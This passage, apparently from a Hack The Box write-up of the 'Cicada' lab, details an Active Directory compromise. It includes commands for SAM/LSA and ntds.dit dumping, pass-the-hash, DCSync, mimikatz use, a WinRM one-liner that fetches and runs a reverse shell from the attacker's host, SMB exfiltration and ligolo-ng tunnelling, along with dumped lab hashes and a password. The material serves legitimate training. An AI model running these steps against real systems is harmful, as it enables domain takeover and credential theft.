[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:6209748a5ab74c44bd98fc5015b6646467841a634c4a1b2d6733289c33f76fc6427f7ccd8f6d978a79eec3ae49eb8c0b5b14e193ec484ea1152e8a04e01a3403b3111c0373d126a566660a7dd083aec1921d53a82bc5129408627ae5be5e945ed58cfb77a2a50e9ffe7e6a4531febd965181e528815d264885921118fb7a74eff51306dbffa4d6a0c995be5c35063576fc4a3eba39d0168d4601da0a0c12748ae870ff36d7fb044649032f550f04c017f6d94675b3517d06450561c71ddf8734100898bf2c19359c69d1070977f070e3b8180210a92488534726005588c0f269a7e182c3c04b96f7b5bc4af488e128f8
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0e3d4a419282c47327eb03989632b3bef8998f71
dpapi_userkey:0x4bb80d985193ae360a4d97f3ca06350b02549fbb
[*] NL$KM 
 0000   CC 15 01 F7 64 39 1E 7A  5E 53 8C C1 74 E6 2B 01   ....d9.z^S..t.+.
 0010   36 9B 50 B8 D0 72 23 D9  B6 C5 6E 92 2F 57 08 D8   6.P..r#...n./W..
 0020   1E BA 8E 81 23 25 03 27  36 4C 19 B4 96 CD 25 1F   ....#%.'6L....%.
 0030   8F F9 7F 5D 71 E6 6E 8C  FF CB EB 5E 4E A4 E6 96   ...]q.n....^N...
NL$KM:cc1501f764391e7a5e538cc174e62b01369b50b8d07223d9b6c56e922f5708d81eba8e8123250327364c19b496cd251f8ff97f5d71e66e8cffcbeb5e4ea4e696
[*] Cleaning up... 
```

The SAM and LSA secrets get resolved to local credentials, which are invalid on the domain.  
However, the NThash for `$MACHINE.ACC` corresponds to the Domain Controller and is valid on the domain. It can be used for DCsync:

```console
opcode@debian$ secretsdump.py cicada.htb/'CICADA-DC$'@CICADA-DC.cicada.htb -hashes :188c2f3cb7592e18d1eae37991dee696 -just-dc
Impacket v0.12.0.dev1+20240815.101442.9eb25b3b - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Could not connect: timed out
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 
```

It failed because the higher RPC ports needed for DRSUAPI were not exposed.  
On this machine, however, the passwords for the Local Administrator and Domain Administrator are the same:

```console
root@ac7b58036eae:~# nxc winrm 10.10.11.35 -d cicada.htb -u 'Administrator' -H 2b87e7c93a3e8a0ea4a581937016f341 -X 'IEX(IWR http://10.10.14.26:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.26 9001'
```

```console
PS C:\Windows\system32> whoami
cicada\administrator
```

### Dumping SAM and LSA secrets - On Machine

I also tried the manual approach to dump hives:

```console
PS C:\> reg save HKLM\SAM SAM
The operation completed successfully.
PS C:\> reg save HKLM\SYSTEM SYSTEM
The operation completed successfully.
PS C:\> reg save HKLM\SECURITY SECURITY
ERROR: Access is denied.
```

I worked around this `Access is denied` issue with <https://github.com/Wh04m1001/Random/blob/main/BackupOperators.cpp>:

```console
opcode@debian$ wget https://raw.githubusercontent.com/Wh04m1001/Random/refs/heads/main/BackupOperators.cpp
opcode@debian$ sed -i 's/<username>/emily.oscars/g' BackupOperators.cpp
opcode@debian$ sed -i 's/<password>/Q!3@Lp#M6b*7t*Vt/g' BackupOperators.cpp
opcode@debian$ sed -i 's/<domain>/cicada.htb/g' BackupOperators.cpp
opcode@debian$ sed -i 's/<computername>/CICADA-DC/g' BackupOperators.cpp
opcode@debian$ sed -i 's/C:\\\\windows\\\\temp/C:\\\\windows\\\\tasks/g' BackupOperators.cpp
opcode@debian$ sed -i 's/Windows.h/windows.h/g' BackupOperators.cpp
```

Compile it with:

```console
opcode@debian$ x86_64-w64-mingw32-g++ -o BackupOperators.exe BackupOperators.cpp
```

```console
PS C:\Windows\Tasks> iwr 10.10.14.26:8000/BackupOperators.exe -o BackupOperators.exe
PS C:\Windows\Tasks> .\BackupOperators.exe
Dumping SAM hive to C:\windows\tasks\sam.hive
Dumping SYSTEM hive to C:\windows\tasks\system.hive
Dumping SECURITY hive to C:\windows\tasks\security.hive
```

We could either exfil them and use `secretsdump.py`, or upload and use [mimikatz](https://github.com/gentilkiwi/mimikatz) directly on the machine:

```console
PS C:\Windows\Tasks> iwr 10.10.14.26:8000/vividogz/x64/mimikatz.exe -o mimikatz.exe
PS C:\Windows\Tasks> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::sam /sam:sam.hive /system:system.hive
Domain : CICADA-DC
SysKey : 3c2b033757a49110a9ee680b46e8d620
Local SID : S-1-5-21-47050115-2771739599-2321771406

SAMKey : a1c299e572ff8c643a857d3fdb3e5c7c

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 2b87e7c93a3e8a0ea4a581937016f341

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount


mimikatz # lsadump::secrets /security:security.hive /system:system.hive
Domain : CICADA-DC
SysKey : 3c2b033757a49110a9ee680b46e8d620

Local name : CICADA-DC ( S-1-5-21-47050115-2771739599-2321771406 )
Domain name : CICADA ( S-1-5-21-917908876-1423158569-3159038727 )
Domain FQDN : cicada.htb

Policy subsystem is : 1.18
LSA Key(s) : 1, default {2d9100ca-a64e-d03d-54d3-102b9ed86515}
  [00] {2d9100ca-a64e-d03d-54d3-102b9ed86515} d708593d9902092e032c6d2cdb0d1335af5bbffb53a5bcedbe0980e3a971b9be

Secret  : $MACHINE.ACC
cur/hex : 62 09 74 8a 5a b7 4c 44 bd 98 fc 50 15 b6 64 64 67 84 1a 63 4c 4a 1b 2d 67 33 28 9c 33 f7 6f c6 42 7f 7c cd 8f 6d 97 8a 79 ee c3 ae 49 eb 8c 0b 5b 14 e1 93 ec 48 4e a1 15 2e 8a 04 e0 1a 34 03 b3 11 1c 03 73 d1 26 a5 66 66 0a 7d d0 83 ae c1 92 1d 53 a8 2b c5 12 94 08 62 7a e5 be 5e 94 5e d5 8c fb 77 a2 a5 0e 9f fe 7e 6a 45 31 fe bd 96 51 81 e5 28 81 5d 26 48 85 92 11 18 fb 7a 74 ef f5 13 06 db ff a4 d6 a0 c9 95 be 5c 35 06 35 76 fc 4a 3e ba 39 d0 16 8d 46 01 da 0a 0c 12 74 8a e8 70 ff 36 d7 fb 04 46 49 03 2f 55 0f 04 c0 17 f6 d9 46 75 b3 51 7d 06 45 05 61 c7 1d df 87 34 10 08 98 bf 2c 19 35 9c 69 d1 07 09 77 f0 70 e3 b8 18 02 10 a9 24 88 53 47 26 00 55 88 c0 f2 69 a7 e1 82 c3 c0 4b 96 f7 b5 bc 4a f4 88 e1 28 f8
    NTLM:188c2f3cb7592e18d1eae37991dee696
    SHA1:391dcc1b44f321a1642647712edcac628ee2ce78
old/hex : 07 fb ce 93 7c d1 1a d2 47 62 25 de 02 eb 28 49 ee 73 3f 0c c2 f7 3a f6 27 09 b8 19 f3 f0 e9 23 7a e4 df 76 ee 65 6d dc 47 63 a5 f1 db 89 ed ba be 01 ba 36 e6 7a 1f 06 79 4e 10 72 04 27 1b 92 5c af 81 2e b0 27 cb 43 a9 b6 a4 7e 85 62 e4 b5 f7 5b 0b 61 1e 4d 16 0b 2b d4 9b 85 93 b8 6c bd f1 14 ed d0 70 7a 78 2c 24 b8 f8 27 34 d6 b2 09 0e 7a 75 92 13 fc a6 f4 c3 da e3 ba f9 0c dd 61 7a 1f b1 36 70 37 e9 97 37 fe a0 ee 1b 94 ae f7 4d 9f 9c 07 a7 b1 cb da f0 3f 05 a9 75 c8 ab 3a b0 29 05 c0 ef 56 49 59 e9 ff 10 2b 67 4a 5c 28 1d 3b 14 5e 9e 91 08 89 14 42 3e d6 0e a0 17 c9 9a 8d 41 d3 bb 33 2d 69 5b cf 69 b8 0a 02 0f f2 99 21 a4 d1 9f cd dc 30 e7 b1 d1 dd 73 a2 52 9d 47 d7 ae 68 50 d6 a6 25 0f c1 bc bd fa f4 aa 0f
    NTLM:3cc621f508866c522ea1f99274c0ff40
    SHA1:338843b05d3d38a9fdc41ecc52dae4144935ccb3

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 0e 3d 4a 41 92 82 c4 73 27 eb 03 98 96 32 b3 be f8 99 8f 71 4b b8 0d 98 51 93 ae 36 0a 4d 97 f3 ca 06 35 0b 02 54 9f bb 
    full: 0e3d4a419282c47327eb03989632b3bef8998f714bb80d985193ae360a4d97f3ca06350b02549fbb
    m/u : 0e3d4a419282c47327eb03989632b3bef8998f71 / 4bb80d985193ae360a4d97f3ca06350b02549fbb
old/hex : 01 00 00 00 0d d8 fb 73 5f 56 56 42 b4 a0 f6 ce df 6f bb 6d fd 89 8a 69 1d 3e ee 17 60 c5 05 3d a9 e3 27 9c 90 21 d6 bd 33 d4 9b 85
    full: 0dd8fb735f565642b4a0f6cedf6fbb6dfd898a691d3eee1760c5053da9e3279c9021d6bd33d49b85
    m/u : 0dd8fb735f565642b4a0f6cedf6fbb6dfd898a69 / 1d3eee1760c5053da9e3279c9021d6bd33d49b85

Secret  : NL$KM
cur/hex : cc 15 01 f7 64 39 1e 7a 5e 53 8c c1 74 e6 2b 01 36 9b 50 b8 d0 72 23 d9 b6 c5 6e 92 2f 57 08 d8 1e ba 8e 81 23 25 03 27 36 4c 19 b4 96 cd 25 1f 8f f9 7f 5d 71 e6 6e 8c ff cb eb 5e 4e a4 e6 96
old/hex : cc 15 01 f7 64 39 1e 7a 5e 53 8c c1 74 e6 2b 01 36 9b 50 b8 d0 72 23 d9 b6 c5 6e 92 2f 57 08 d8 1e ba 8e 81 23 25 03 27 36 4c 19 b4 96 cd 25 1f 8f f9 7f 5d 71 e6 6e 8c ff cb eb 5e 4e a4 e6 96
```

### Dumping ntds.dit - On Machine

Instead of remotely performing DCsync, we can dump `ntds.dit` locally with the `Backup Operators` privileges.  
It is not possible to directly copy `ntds.dit`. We need to mimic a backup utility and use Win32 API calls to copy it to an accessible folder.  
`diskshadow` is a lolbin which can be used to make a shadow copy:

```console
PS C:\Windows\Tasks> echo @"
set context persistent nowriters 
set metadata c:\windows\system32\spool\drivers\color\example.cab 
set verbose on 
add volume c: alias mydrive 
create 
expose %mydrive% w: 
"@ | Out-File C:\Windows\Tasks\script -Encoding ascii

PS C:\Windows\Tasks> diskshadow.exe /s .\script
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  CICADA-DC,  10/1/2024 8:56:56 PM

-> set context persistent nowriters
-> set metadata c:\windows\system32\spool\drivers\color\example.cab
-> set verbose on
-> add volume c: alias mydrive
-> create

Alias mydrive for shadow ID {b8af1819-e164-4d13-a7fa-2e5930ec535b} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {47e43047-04c2-4b8d-86b7-f3fb54ad9715} set as environment variable.
Inserted file Manifest.xml into .cab file example.cab
Inserted file Dis84F9.tmp into .cab file example.cab

Querying all shadow copies with the shadow copy set ID {47e43047-04c2-4b8d-86b7-f3fb54ad9715}

        * Shadow copy ID = {b8af1819-e164-4d13-a7fa-2e5930ec535b}               %mydrive%
                - Shadow copy set: {47e43047-04c2-4b8d-86b7-f3fb54ad9715}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{fcebaf9b-0000-0000-0000-500600000000}\ [C:\]
                - Creation time: 10/1/2024 8:56:57 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: CICADA-DC.cicada.htb
                - Service machine: CICADA-DC.cicada.htb
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %mydrive% w:
-> %mydrive% = {b8af1819-e164-4d13-a7fa-2e5930ec535b}
The shadow copy was successfully exposed as w:\.
```

The DLLs from [SeBackupPrivilege repository](https://github.com/giuliano108/SeBackupPrivilege) can now be used.  
Pre-built versions are available at <https://github.com/k4sth4/SeBackupPrivilege>

```console
PS C:\Windows\Tasks> IWR http://10.10.14.26:8000/SeBackupPrivilegeCmdLets.dll -o SeBackupPrivilegeCmdLets.dll
PS C:\Windows\Tasks> IWR http://10.10.14.26:8000/SeBackupPrivilegeUtils.dll -o SeBackupPrivilegeUtils.dll
PS C:\Windows\Tasks> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\Windows\Tasks> Import-Module .\SeBackupPrivilegeUtils.dll
```

```console
PS C:\Windows\Tasks> Copy-FileSeBackupPrivilege w:\Windows\NTDS\ntds.dit C:\Windows\Tasks\ntds.dit -Overwrite
PS C:\Windows\Tasks> Copy-FileSeBackupPrivilege w:\Windows\System32\config\SYSTEM C:\Windows\Tasks\SYSTEM -Overwrite
```

Robocopy could also have been used instead of the DLLs for copying:

```console
PS C:\Windows\Tasks> robocopy /b w:\Windows\NTDS\ . ntds.dit
PS C:\Windows\Tasks> robocopy /b w:\Windows\System32\config\ . SYSTEM
```

I exfiltrated them from the system with an SMB server hosted on my VM.

```console
opcode@debian$ smbserver.py -username opcode -password opcode -smb2support crate `pwd`
```

```console
PS C:\Windows\Tasks> net use \\10.10.14.26\crate opcode /user:opcode
PS C:\Windows\Tasks> copy .\ntds.dit \\10.10.14.26\crate\
PS C:\Windows\Tasks> copy .\SYSTEM \\10.10.14.26\crate\
```

`secretsdump.py` can be used locally:

```console
opcode@debian$ secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.12.0.dev1+20240815.101442.9eb25b3b - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
cicada.htb\john.smoulder:1104:aad3b435b51404eeaad3b435b51404ee:0d33a055d07e231ce088a91975f28dc4:::
cicada.htb\sarah.dantelia:1105:aad3b435b51404eeaad3b435b51404ee:d1c88b5c2ecc0e2679000c5c73baea20:::
cicada.htb\michael.wrightson:1106:aad3b435b51404eeaad3b435b51404ee:b222964c9f247e6b225ce9e7c4276776:::
cicada.htb\david.orelious:1108:aad3b435b51404eeaad3b435b51404ee:ef0bcbf3577b729dcfa6fbe1731d5a43:::
cicada.htb\emily.oscars:1601:aad3b435b51404eeaad3b435b51404ee:559048ab2d168a4edf8e033d43165ee5:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:e47fd7646fa8cf1836a79166f5775405834e2c060322d229bc93f26fb67d2be5
Administrator:aes128-cts-hmac-sha1-96:f51b243b116894bea389709127df1652
Administrator:des-cbc-md5:c8838c9b10c43b23
CICADA-DC$:aes256-cts-hmac-sha1-96:e9752f2c7752bd92142588e63dc0383499f49b04a46de37845e33d40de1db7ed
CICADA-DC$:aes128-cts-hmac-sha1-96:7fc8e7f2daa14d0ccdf070de9cfc49c5
CICADA-DC$:des-cbc-md5:b0f7cdec040d5b6d
krbtgt:aes256-cts-hmac-sha1-96:357f15dd4d315af47ac63658c444526ec0186f066ad9efb46906a7308b7c60c8
krbtgt:aes128-cts-hmac-sha1-96:39cbc0f220550c51fb89046ac652849e
krbtgt:des-cbc-md5:73b6c419b3b9bf7c
cicada.htb\john.smoulder:aes256-cts-hmac-sha1-96:57ae6faf294b7e6fbd0ce5121ac413d529ae5355535e20739a19b6fd2a204128
cicada.htb\john.smoulder:aes128-cts-hmac-sha1-96:8c0add65bd3c9ad2d1f458a719cfda81
cicada.htb\john.smoulder:des-cbc-md5:f1feaeb594b08575
cicada.htb\sarah.dantelia:aes256-cts-hmac-sha1-96:e25f0b9181f532a85310ba6093f24c1f2f10ee857a97fe18d716ec713fc47060
cicada.htb\sarah.dantelia:aes128-cts-hmac-sha1-96:2ac9a92bca49147a0530e5ce84ceee7d
cicada.htb\sarah.dantelia:des-cbc-md5:0b5b014370fdab67
cicada.htb\michael.wrightson:aes256-cts-hmac-sha1-96:d89ff79cc85032f27499425d47d3421df678eace01ce589eb128a6ffa0216f46
cicada.htb\michael.wrightson:aes128-cts-hmac-sha1-96:f1290a5c4e9d4ef2cd7ad470600124a9
cicada.htb\michael.wrightson:des-cbc-md5:eca8d532fd8f26bc
cicada.htb\david.orelious:aes256-cts-hmac-sha1-96:125726466d0431ed1441caafe8c0ed9ec0d10b0dbaf4fec7a184b764d8a36323
cicada.htb\david.orelious:aes128-cts-hmac-sha1-96:ce66c04e5fd902b15f5d4c611927c9c2
cicada.htb\david.orelious:des-cbc-md5:83585bc41573897f
cicada.htb\emily.oscars:aes256-cts-hmac-sha1-96:4abe28adc1d16373f4c8db4d9bfd34ea1928aca72cb69362d3d90f69d80c000f
cicada.htb\emily.oscars:aes128-cts-hmac-sha1-96:f98d74d70dfb68b70ddd821edcd6a023
cicada.htb\emily.oscars:des-cbc-md5:fd4a5497d38067cd
[*] Cleaning up... 
```

### Side quest - Exposing ports with Ligolo-ng for DCsync

The higher RPC ports were not exposed, resulting in a failure when DCsync was attempted. Therefore, I forwarded all ports with [ligolo-ng](https://github.com/nicocha30/ligolo-ng).  
Start the `proxy` on the attacker machine:

```console
opcode@debian$ sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
WARN[0000] TLS Certificate fingerprint for ligolo is: EA9C5407D0A02D98DA1CA87248F1334653433A24167DF1409017ACC730A2F9DC 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.6.2

ligolo-ng »  
```

Transfer and execute the `agent` on target machine:

```console
PS C:\Windows\Tasks> iwr 10.10.14.26:8000/agent.exe -o agent.exe
PS C:\Windows\Tasks> .\agent.exe -connect 10.10.14.26:11601 -ignore-cert
```

Create the ligolo tun interface and add the ligolo's magic CIDR route to access internal ports:

```console
ligolo-ng » INFO[0002] Agent joined.                                 name="CICADA\\emily.oscars@CICADA-DC" remote="10.10.11.35:49777"
ligolo-ng » session
? Specify a session : 1 - #1 - CICADA\emily.oscars@CICADA-DC - 10.10.11.35:49777
[Agent : CICADA\emily.oscars@CICADA-DC] » interface_create --name ligolo
INFO[0006] Creating a new "ligolo" interface...         
INFO[0006] Interface created!                           
[Agent : CICADA\emily.oscars@CICADA-DC] » interface_add_route --name ligolo --route 240.0.0.1/32
INFO[0012] Route created.                               
[Agent : CICADA\emily.oscars@CICADA-DC] » start
[Agent : CICADA\emily.oscars@CICADA-DC] » INFO[0014] Starting tunnel to CICADA\emily.oscars@CICADA-DC 
```

Now, the local ports can be accessed on 240.0.0.1:

```console
opcode@debian$ nmap -Pn -p 5985,9389,47001 240.0.0.1
Nmap scan report for 240.0.0.1
Host is up (0.19s latency).

PORT      STATE SERVICE
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
```

DCsync works after port forwarding:

```console
opcode@debian$ secretsdump.py cicada.htb/'CICADA-DC$'@240.0.0.1 -hashes :188c2f3cb7592e18d1eae37991dee696 -just-dc
Impacket v0.12.0.dev1+20240815.101442.9eb25b3b - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
cicada.htb\john.smoulder:1104:aad3b435b51404eeaad3b435b51404ee:0d33a055d07e231ce088a91975f28dc4:::
cicada.htb\sarah.dantelia:1105:aad3b435b51404eeaad3b435b51404ee:d1c88b5c2ecc0e2679000c5c73baea20:::
cicada.htb\michael.wrightson:1106:aad3b435b51404eeaad3b435b51404ee:b222964c9f247e6b225ce9e7c4276776:::
cicada.htb\david.orelious:1108:aad3b435b51404eeaad3b435b51404ee:ef0bcbf3577b729dcfa6fbe1731d5a43:::
cicada.htb\emily.oscars:1601:aad3b435b51404eeaad3b435b51404ee:559048ab2d168a4edf8e033d43165ee5:::
CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e47fd7646fa8cf1836a79166f5775405834e2c060322d229bc93f26fb67d2be5
Administrator:aes128-cts-hmac-sha1-96:f51b243b116894bea389709127df1652
Administrator:des-cbc-md5:c8838c9b10c43b23
krbtgt:aes256-cts-hmac-sha1-96:357f15dd4d315af47ac63658c444526ec0186f066ad9efb46906a7308b7c60c8
krbtgt:aes128-cts-hmac-sha1-96:39cbc0f220550c51fb89046ac652849e
krbtgt:des-cbc-md5:73b6c419b3b9bf7c
cicada.htb\john.smoulder:aes256-cts-hmac-sha1-96:57ae6faf294b7e6fbd0ce5121ac413d529ae5355535e20739a19b6fd2a204128
cicada.htb\john.smoulder:aes128-cts-hmac-sha1-96:8c0add65bd3c9ad2d1f458a719cfda81
cicada.htb\john.smoulder:des-cbc-md5:f1feaeb594b08575
cicada.htb\sarah.dantelia:aes256-cts-hmac-sha1-96:e25f0b9181f532a85310ba6093f24c1f2f10ee857a97fe18d716ec713fc47060
cicada.htb\sarah.dantelia:aes128-cts-hmac-sha1-96:2ac9a92bca49147a0530e5ce84ceee7d
cicada.htb\sarah.dantelia:des-cbc-md5:0b5b014370fdab67
cicada.htb\michael.wrightson:aes256-cts-hmac-sha1-96:d89ff79cc85032f27499425d47d3421df678eace01ce589eb128a6ffa0216f46
cicada.htb\michael.wrightson:aes128-cts-hmac-sha1-96:f1290a5c4e9d4ef2cd7ad470600124a9
cicada.htb\michael.wrightson:des-cbc-md5:eca8d532fd8f26bc
cicada.htb\david.orelious:aes256-cts-hmac-sha1-96:125726466d0431ed1441caafe8c0ed9ec0d10b0dbaf4fec7a184b764d8a36323
cicada.htb\david.orelious:aes128-cts-hmac-sha1-96:ce66c04e5fd902b15f5d4c611927c9c2
cicada.htb\david.orelious:des-cbc-md5:83585bc41573897f
cicada.htb\emily.oscars:aes256-cts-hmac-sha1-96:4abe28adc1d16373f4c8db4d9bfd34ea1928aca72cb69362d3d90f69d80c000f
cicada.htb\emily.oscars:aes128-cts-hmac-sha1-96:f98d74d70dfb68b70ddd821edcd6a023
cicada.htb\emily.oscars:des-cbc-md5:fd4a5497d38067cd
CICADA-DC$:aes256-cts-hmac-sha1-96:e9752f2c7752bd92142588e63dc0383499f49b04a46de37845e33d40de1db7ed
CICADA-DC$:aes128-cts-hmac-sha1-96:7fc8e7f2daa14d0ccdf070de9cfc49c5
CICADA-DC$:des-cbc-md5:b0f7cdec040d5b6d
[*] Cleaning up... 
```

On a machine where all ports are exposed, we can use Wireshark to view the involved ports:

![1](images/1.png)

![2](images/2.png)

DRSUAPI uses a higher RPC port on the victim. The destination port was 49680 in this case.

### Side quest - Using a VPS to overcome latency issues

Sometimes, due to latency issues combined with the large size of the `SYSTEM` hive, dumping it can lead to a timeout:

```console
opcode@debian$ reg.py cicada.htb/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@CICADA-DC.cicada.htb save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.26\crate'
Impacket v0.12.0.dev1+20240815.101442.9eb25b3b - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[-] Couldn't save HKLM\SYSTEM: The NETBIOS connection with the remote host timed out.
```

In such cases, I spin up an Azure VM in the EU region and use that instance to dump the hashes.  
First, transfer the `.ovpn` file to the Azure VM:

```console
opcode@debian$ scp -i id_rsa ~/Opcode/HTB/competitive_Opcode.ovpn opcode@20.xxx.xxx.xxx:~/competitive_Opcode.ovpn
```

And connect to the VPN there:

```console
opcode@server:~$ sudo openvpn competitive_Opcode.ovpn 
```

After updating `/etc/hosts` and installing [impacket](https://github.com/fortra/impacket), start the `smbserver.py`:

```console
opcode@server:~$ sudo apt install libcap2-bin
opcode@server:~$ sudo setcap 'cap_net_bind_service=+ep' /usr/bin/python3.11
opcode@server:~$ ~/.local/bin/smbserver.py -smb2support crate `pwd`
```

Use `setcap` to add the `cap_net_bind_service` capability to the Python binary. It is a requirement to bind lower ports without root privileges.  
Then use `reg.py`:

```console
opcode@server:~$ ~/.local/bin/reg.py cicada.htb/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@CICADA-DC.cicada.htb backup -o '\\10.10.14.26\crate'
Impacket v0.12.0.dev1+20240821.233453.b6713d20 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.10.14.26\crate\SAM.save
[*] Saved HKLM\SYSTEM to \\10.10.14.26\crate\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.10.14.26\crate\SECURITY.save
```

It would work fine without any latency issues. Finally, `secretsdump.py` can be used:

```console
opcode@server:~$ ~/.local/bin/secretsdump.py -sam SAM.save -security SECURITY.save -system SYSTEM.save LOCAL
```
